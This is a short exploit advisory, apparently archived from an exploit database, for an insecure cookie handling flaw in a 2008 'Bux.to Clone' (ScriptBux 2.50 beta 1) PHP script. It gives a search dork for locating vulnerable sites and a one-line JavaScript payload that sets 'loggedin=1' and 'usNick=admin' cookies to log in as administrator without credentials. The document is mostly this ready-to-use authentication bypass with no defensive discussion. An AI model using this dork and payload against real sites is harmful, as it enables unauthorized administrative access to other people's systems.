id: 3823
date: 10/01/2008
title: Bux.to Clone Script Insecure Cookie Handling Vulnerability
author: SirGod
cves: 

==========================================================
Bux.to Clone Script Insecure Cookie Handling Vulnerability
==========================================================


#############################################################################################
[+] Bux.to Clone script Insecure Cookie Handling Vulnerability
[+] Discovered By SirGod
#############################################################################################

[+] Dork : (c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1

[+] Insecure Cookie Handling Vulnerability

javascript:document.cookie = "loggedin=1; path=/"; document.cookie =
"usNick=admin; path=/";

#############################################################################################



#  0day.today [2023-03-22]  #